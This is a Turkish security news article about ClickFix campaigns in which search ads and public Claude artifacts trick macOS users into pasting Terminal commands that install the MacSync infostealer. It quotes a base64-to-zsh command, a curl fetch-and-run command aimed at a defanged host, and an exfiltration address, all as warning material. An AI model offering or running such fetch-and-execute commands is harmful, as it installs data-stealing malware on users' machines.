Siber Güvenlik

Kritik Uyarı: Claude LLM Kötüye Kullanılıyor, Mac Bilgileri Çalınıyor!

teknomers
teknomers

Giriş

Kötü niyetli aktörler, Claude ve Google Ads’i kullanarak macOS kullanıcılarına yönelik infostealer kötü amaçlı yazılım dağıtan ClickFix kampanyaları düzenliyor. Bu saldırılar, belirli aramalara yanıt olarak tehlikeli içeriklerin sunulmasıyla gerçekleşiyor ve ciddi bir güvenlik tehdidi oluşturuyor.

Contents

Saldırı Nasıl Çalışıyor?

Araştırmalara göre, saldırının en az iki varyasyonu gözlemlenmiştir. Kullanıcılara yönelik kötü amaçlı arama sonuçları, aşağıdaki gibi sorgular üzerinden gerçekleştirilmektedir:

  • “online DNS resolver”
  • “macOS CLI disk space analyzer”
  • “HomeBrew”

Bu arama sonuçları, ya kamuya açık bir Claude artifact’ine veya sahte Apple Destek makalesine yönlendirmektedir. Her iki durumda da kullanıcıdan Terminal’e bir shell komutu yapıştırması istenmektedir.

İlk saldırı varyasyonunda verilen komut:
‘echo "..." | base64 -D | zsh,’

İkinci varyasyonda ise verilen komut:
‘true && cur""l -SsLfk --compressed "https://raxelpak[.]com/curl/[hash]" | zsh’

Bu komutların çalıştırılması, kullanıcıların sistemlerine kötü amaçlı bir yazılım olan MacSync infostealer’ı yüklemektedir.

Etkilenen Sistemler

CVE kodları arası bağlantılar ile etkilenen sistemlerin özellikleri:

  • Kötü amaçlı yazılım, sistemde bulunan hassas bilgileri toplamak için kullanıcıdan yetki alır.
  • MacSync infostealer, kullanıcı verilerini topladıktan sonra bu bilgileri a2abotnet[.]com/gate adresine iletmektedir.

Çözüm ve Korunma

Kullanıcılara, Terminal’de tam olarak anlamadıkları komutları çalıştırmamaları yönünde güçlü bir uyarıda bulunulmaktadır.  Kaspersky  araştırmacıları, kullanıcıların sağlanan komutların güvenli olup olmadığını belirlemek için aynı konuşmada chatbot’a bunu sormalarını önermektedir.

Ayrıca, aşağıdaki önlemleri almanızı tavsiye ederiz:

  • MacOS sistemlerini güncelleyin.
  • Güvenlik yazılımlarınızı aktif ve güncel tutun.
  • Tehlikeli bulduğunuz arama sonuçlarını takip etmeyin.
  • Bilgisayarınıza gelen şüpheli bağlantılara tıklamayın.

Sonuç olarak, kullanıcıların dikkatli olması ve güvenlik önlemlerini artırarak siber saldırılardan korunmaları hayati önem taşımaktadır.

Coro Ek 75 Milyon Dolar Arttırarak Toplamı 12 Ayda 155 Milyon Dolara Çıkardı
Şimdi Yama Yapmanız Gerekenler
Açık Gökyüzü, İlginç Kimya: Webb, Sub-Neptünler Hakkında Bilgileri Değiştirdi
900K Kurulumu Olan WordPress Eklentisi Acil Kritik RCE Açığına Sahip
Acil: Windows 11 KB5095093 Güncellemesi ile Noktada Geri Dönüş Özelliği
ETİKETLENDİ:
Bu Makaleyi Paylaş
Önceki Makale Fintech Devlerinden Figure’dan Veri İhlali Açıklaması
Sonraki Makale ABD ile Tayvan arasındaki ticaret anlaşması: Gümrük %15’e düştü

Sanal Medya

Son Eklenenler

Eufy Floodlight Güvenlik Kamerası Fiyatı Şimdi Daha Uygun!
Genel
Apple, 2027 için M7 çipleri hızlandıracak, M6 çıkabilir
Donanım
Geliştirici Günlüğü: 2026-06-26 — Yapılandırma Odaklı Faturalama, Uygulama Genelinde Yeniden Markalaşma ve Markalı Hata Sayfaları
Yazılım
2026 Amazon Prime Günü: Bose Kulaklıklarımın Kesin Alışverişi!
Genel
Framework Laptop 13 Pro fiyatı düştü, CPU artışı kapıda
Donanım
2026 Prime Day: Ninja Slushi, Creami ve Cafe Luxe İle Kaçırılmayacak Fırsatlar!
Genel